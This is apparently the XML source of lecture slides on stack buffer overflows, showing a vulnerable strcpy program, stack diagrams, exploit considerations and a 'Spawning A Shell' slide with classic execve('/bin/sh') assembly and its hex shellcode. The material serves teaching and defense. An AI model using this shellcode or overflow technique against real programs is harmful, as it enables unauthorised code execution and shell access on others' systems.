              <a:rPr lang="en-US" sz="2400" dirty="0" err="1">
                <a:latin typeface="Arial Unicode MS" charset="0"/>
              </a:rPr>
              <a:t>printf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Arial Unicode MS" charset="0"/>
              </a:rPr>
              <a:t>("%d\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1">
                <a:latin typeface="Arial Unicode MS" charset="0"/>
              </a:rPr>
              <a:t>n",x</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Arial Unicode MS" charset="0"/>
              </a:rPr>
              <a:t>);  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72346" y="2495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6305490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52400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524000" y="64770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607689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209800" y="20574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3539445" y="1614832"/>
            <a:ext cx="995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buffer1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657600" y="211449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ret</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="25" name="Curved Right Arrow 24"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipH="1" flipV="1">
            <a:off x="8468436" y="685800"/>
            <a:ext cx="675564" cy="1752594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13031" y="5663624"/>
            <a:ext cx="910426" cy="58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02346"/>
                </a:solidFill>
              </a:rPr>
              <a:t>x=0</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="799274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B11734D8-1436-9F4B-B415-D8A9FC04BB33}" type="slidenum">
              <a:rPr lang="en-US"/>
              <a:pPr/>
              <a:t>32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 What?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how we can overwrite the return address of our own program to crash it or skip a few instructions.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>How can these principles be used by an attacker to hijack the execution of a program, e.g., spawning a shell?</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="8928472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29718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19400" y="3823121"/>
            <a:ext cx="5025848" cy="242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void function(char *</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1">
                <a:latin typeface="Arial Unicode MS" charset="0"/>
              </a:rPr>
              <a:t>str</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1">
                <a:latin typeface="Arial Unicode MS" charset="0"/>
              </a:rPr>
              <a:t>strcpy</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Arial Unicode MS" charset="0"/>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1">
                <a:latin typeface="Arial Unicode MS" charset="0"/>
              </a:rPr>
              <a:t>buffer,str</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400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void main(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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1">
                <a:latin typeface="Arial Unicode MS" charset="0"/>
              </a:rPr>
              <a:t>argc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Arial Unicode MS" charset="0"/>
              </a:rPr>
              <a:t>, char* </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1">
                <a:latin typeface="Arial Unicode MS" charset="0"/>
              </a:rPr>
              <a:t>argv</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Arial Unicode MS" charset="0"/>
              </a:rPr>
              <a:t>[])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 function(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1">
                <a:latin typeface="Arial Unicode MS" charset="0"/>
              </a:rPr>
              <a:t>argv</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Arial Unicode MS" charset="0"/>
              </a:rPr>
              <a:t>[1]);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72346" y="2495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537282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52400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7244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11480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3" name="Curved Right Arrow 52"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="89676" y="685800"/>
            <a:ext cx="2133262" cy="595243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2209800" y="5842153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209800" y="20574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3539445" y="1614832"/>
            <a:ext cx="9959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buffer1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657600" y="211449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615875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29718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19400" y="3823121"/>
            <a:ext cx="5025848" cy="242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void function(char *</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1">
                <a:latin typeface="Arial Unicode MS" charset="0"/>
              </a:rPr>
              <a:t>str</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1">
                <a:latin typeface="Arial Unicode MS" charset="0"/>
              </a:rPr>
              <a:t>strcpy</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Arial Unicode MS" charset="0"/>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1">
                <a:latin typeface="Arial Unicode MS" charset="0"/>
              </a:rPr>
              <a:t>buffer,str</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400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void main(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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1">
                <a:latin typeface="Arial Unicode MS" charset="0"/>
              </a:rPr>
              <a:t>argc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Arial Unicode MS" charset="0"/>
              </a:rPr>
              <a:t>, char* </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1">
                <a:latin typeface="Arial Unicode MS" charset="0"/>
              </a:rPr>
              <a:t>argv</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Arial Unicode MS" charset="0"/>
              </a:rPr>
              <a:t>[])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 function(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1">
                <a:latin typeface="Arial Unicode MS" charset="0"/>
              </a:rPr>
              <a:t>argv</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Arial Unicode MS" charset="0"/>
              </a:rPr>
              <a:t>[1]);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72346" y="2495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537282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467993" y="152400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7244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11480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3" name="Curved Right Arrow 52"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="89676" y="685800"/>
            <a:ext cx="2133262" cy="5952436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2209800" y="5842153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209800" y="20574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3539445" y="1614832"/>
            <a:ext cx="1873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02346"/>
                </a:solidFill>
              </a:rPr>
              <a:t>spawn_shell</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="202346"/>
                </a:solidFill>
              </a:rPr>
              <a:t>();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657600" y="211449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945059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7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 (point to buffer1)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29718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19400" y="3823121"/>
            <a:ext cx="5025848" cy="242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void function(char *</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1">
                <a:latin typeface="Arial Unicode MS" charset="0"/>
              </a:rPr>
              <a:t>str</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1">
                <a:latin typeface="Arial Unicode MS" charset="0"/>
              </a:rPr>
              <a:t>strcpy</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Arial Unicode MS" charset="0"/>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1">
                <a:latin typeface="Arial Unicode MS" charset="0"/>
              </a:rPr>
              <a:t>buffer,str</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400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void main(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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1">
                <a:latin typeface="Arial Unicode MS" charset="0"/>
              </a:rPr>
              <a:t>argc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Arial Unicode MS" charset="0"/>
              </a:rPr>
              <a:t>, char* </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1">
                <a:latin typeface="Arial Unicode MS" charset="0"/>
              </a:rPr>
              <a:t>argv</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Arial Unicode MS" charset="0"/>
              </a:rPr>
              <a:t>[])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 function(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1">
                <a:latin typeface="Arial Unicode MS" charset="0"/>
              </a:rPr>
              <a:t>argv</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Arial Unicode MS" charset="0"/>
              </a:rPr>
              <a:t>[1]);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72346" y="2495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537282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990600" y="121920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47800" y="47244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439404" y="411480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3" name="Curved Right Arrow 52"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="75769" y="685800"/>
            <a:ext cx="2133262" cy="1600200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209800" y="20574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3539445" y="1614832"/>
            <a:ext cx="1873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02346"/>
                </a:solidFill>
              </a:rPr>
              <a:t>spawn_shell</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="202346"/>
                </a:solidFill>
              </a:rPr>
              <a:t>();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657600" y="211449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829190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2209800" y="304800"/>
            <a:ext cx="6263896" cy="6400800"/>
            <a:chOff x="3120" y="1440"/>
            <a:chExt cx="2021" cy="3312"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="4" name="Rectangle 3"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="3120" y="1440"/>
              <a:ext cx="2016" cy="331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>
                  <a:lumMod val="5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5" name="Line 5"/>
            <p:cNvSpPr>
              <a:spLocks noChangeShapeType="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="3120" y="1677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039" y="1479"/>
              <a:ext cx="201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a</a:t>
              </a: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120" y="1913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3661" y="1672"/>
              <a:ext cx="1275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Return Address (point to buffer1)</a:t>
              </a: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3554" y="1913"/>
              <a:ext cx="158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202346"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>Saved Frame Pointer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3120" y="2150"/>
              <a:ext cx="2016" cy="0"/>
            </a:xfrm>
            <a:prstGeom prst="line">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="9525">
              <a:solidFill>
                <a:schemeClr val="tx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solidFill>
                  <a:srgbClr val="202346"/>
                </a:solidFill>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grp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209800" y="2971800"/>
            <a:ext cx="6248399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19400" y="3823121"/>
            <a:ext cx="5025848" cy="2425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void function(char *</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1">
                <a:latin typeface="Arial Unicode MS" charset="0"/>
              </a:rPr>
              <a:t>str</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Arial Unicode MS" charset="0"/>
              </a:rPr>
              <a:t>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char buffer[8];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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1">
                <a:latin typeface="Arial Unicode MS" charset="0"/>
              </a:rPr>
              <a:t>strcpy</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Arial Unicode MS" charset="0"/>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1">
                <a:latin typeface="Arial Unicode MS" charset="0"/>
              </a:rPr>
              <a:t>buffer,str</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Arial Unicode MS" charset="0"/>
              </a:rPr>
              <a:t>); }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dirty="0">
              <a:latin typeface="Arial Unicode MS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void main(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1">
                <a:latin typeface="Arial Unicode MS" charset="0"/>
              </a:rPr>
              <a:t>int</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Arial Unicode MS" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1">
                <a:latin typeface="Arial Unicode MS" charset="0"/>
              </a:rPr>
              <a:t>argc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Arial Unicode MS" charset="0"/>
              </a:rPr>
              <a:t>, char* </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1">
                <a:latin typeface="Arial Unicode MS" charset="0"/>
              </a:rPr>
              <a:t>argv</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Arial Unicode MS" charset="0"/>
              </a:rPr>
              <a:t>[]) {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    function(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1">
                <a:latin typeface="Arial Unicode MS" charset="0"/>
              </a:rPr>
              <a:t>argv</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Arial Unicode MS" charset="0"/>
              </a:rPr>
              <a:t>[1]);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dirty="0">
                <a:latin typeface="Arial Unicode MS" charset="0"/>
              </a:rPr>
              <a:t>} </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="15" name="Freeform 22"/>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1467993" y="1447800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372346" y="2495490"/>
            <a:ext cx="1602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FP</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp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2222938" y="4537282"/>
            <a:ext cx="6082862" cy="40011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9" name="Freeform 22"/>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1467993" y="2448976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990600" y="1219200"/>
            <a:ext cx="533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SP</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="21" name="Freeform 22"/>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1494178" y="1914211"/>
            <a:ext cx="741807" cy="45719"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="T0" fmla="*/ 0 w 1427"/>
              <a:gd name="T1" fmla="*/ 0 h 1"/>
              <a:gd name="T2" fmla="*/ 1427 w 1427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427" h="1">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="1427" y="0"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:noFill/>
          <a:ln w="1270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1055052" y="1676400"/>
            <a:ext cx="10785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IP</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="23" name="Line 11"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2209031" y="25146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3" name="Curved Right Arrow 52"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipH="1">
            <a:off x="8479041" y="847858"/>
            <a:ext cx="766121" cy="1266632"/>
          </a:xfrm>
          <a:prstGeom prst="curvedRightArrow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55" name="Line 11"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2209800" y="2057400"/>
            <a:ext cx="6249167" cy="0"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:solidFill>
              <a:schemeClr val="tx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solidFill>
                <a:srgbClr val="202346"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="56" name="Text Box 10"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3539445" y="1614832"/>
            <a:ext cx="187358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202346"/>
                </a:solidFill>
              </a:rPr>
              <a:t>spawn_shell</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="202346"/>
                </a:solidFill>
              </a:rPr>
              <a:t>();</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="57" name="Text Box 10"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3657600" y="2114490"/>
            <a:ext cx="50526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346"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ret</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1178843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4C36149E-6A30-4042-A134-DC21D4E51903}" type="slidenum">
              <a:rPr lang="en-US"/>
              <a:pPr/>
              <a:t>37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Exploit Considerations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724400"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>All NULL bytes must be removed from the code to overflow a character buffer (easy to overcome with </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1"/>
              <a:t>xor</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t> instruction)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>Need to overwrite the return address to redirect the execution to either somewhere in the buffer, or to some library function that will return control to the buffer </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>If we want to go to the buffer, how do we know where the buffer starts? (Basically just guess until you get it right)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="144308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657C6C2F-1399-354F-A927-35287AB8CE1B}" type="slidenum">
              <a:rPr lang="en-US"/>
              <a:pPr/>
              <a:t>38</a:t>
            </a:fld>
            <a:endParaRPr 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Spawning A Shell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93725" y="1793875"/>
            <a:ext cx="5229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First we need to generate the attack code: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822325" y="2271713"/>
            <a:ext cx="2535238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jmp	0x1F</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600"/>
              <a:t>popl	%esi</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600"/>
              <a:t>movl	%esi, 0x8(%esi)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600"/>
              <a:t>xorl	%eax, %eax</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600"/>
              <a:t>movb	%eax, 0x7(%esi)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600"/>
              <a:t>movl	%eax, 0xC(%esi)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600"/>
              <a:t>movb	$0xB, %al</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600"/>
              <a:t>movl	%esi, %ebx</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600"/>
              <a:t>leal	0x8(%esi), %ecx</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600"/>
              <a:t>leal 	0xC(%esi), %edx</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600"/>
              <a:t>int 	$0x80</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600"/>
              <a:t>xorl	%ebx, %ebx</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600"/>
              <a:t>movl	%ebx, %eax</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600"/>
              <a:t>inc	%eax</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600"/>
              <a:t>int	$0x80</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600"/>
              <a:t>call	-0x24</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600"/>
              <a:t>.string	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" sz="1600">
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>“</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600"/>
              <a:t>/bin/sh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" sz="1600">
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>”</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="66565" name="Text Box 5"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3505200" y="2286000"/>
            <a:ext cx="5187950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dirty="0"/>
              <a:t>char </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
              <a:t>shellcode</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>[] = </a:t>
            </a:r>
          </a:p>
          <a:p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\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
              <a:t>xeb</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>”</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1800" dirty="0"/>
          </a:p>
          <a:p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\x46\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>”</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1800" dirty="0"/>
          </a:p>
          <a:p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\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
              <a:t>xcd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>\x80\x31\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
              <a:t>xdb</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>\x89\xd8\x40\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
              <a:t>xcd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>\x80\xe8\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
              <a:t>xdc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
              <a:t>xff</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>”</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1800" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>“</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
              <a:t>xff</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
              <a:t>xff</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>/bin/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
              <a:t>sh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>”</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>;</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="66566" name="AutoShape 6"/>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3276600" y="2362200"/>
            <a:ext cx="228600" cy="4038600"/>
          </a:xfrm>
          <a:prstGeom prst="rightBrace">
            <a:avLst>
              <a:gd name="adj1" fmla="val 147222"/>
              <a:gd name="adj2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3733800" y="4168241"/>
            <a:ext cx="48006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dirty="0"/>
              <a:t>Generating the code will be discussed later.  However, the idea is that you need to get the machine code that you intend to execute.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="8833337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imes New Roman" charset="0"/>
              </a:rPr>
              <a:t>Small Buffer Overflows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If the buffer is smaller than our shellcode, we will overwrite the return address with instructions instead of the address of our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Solution: place shellcode in an environment variable then overflow the buffer with the address of this variable in memory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Can make environment variable as large as you want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latin typeface="Times New Roman" charset="0"/>
              </a:rPr>
              <a:t>Only works if you have access to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63659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471488" y="195263"/>
            <a:ext cx="8229600" cy="576262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Security Violation Methods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47725" y="796925"/>
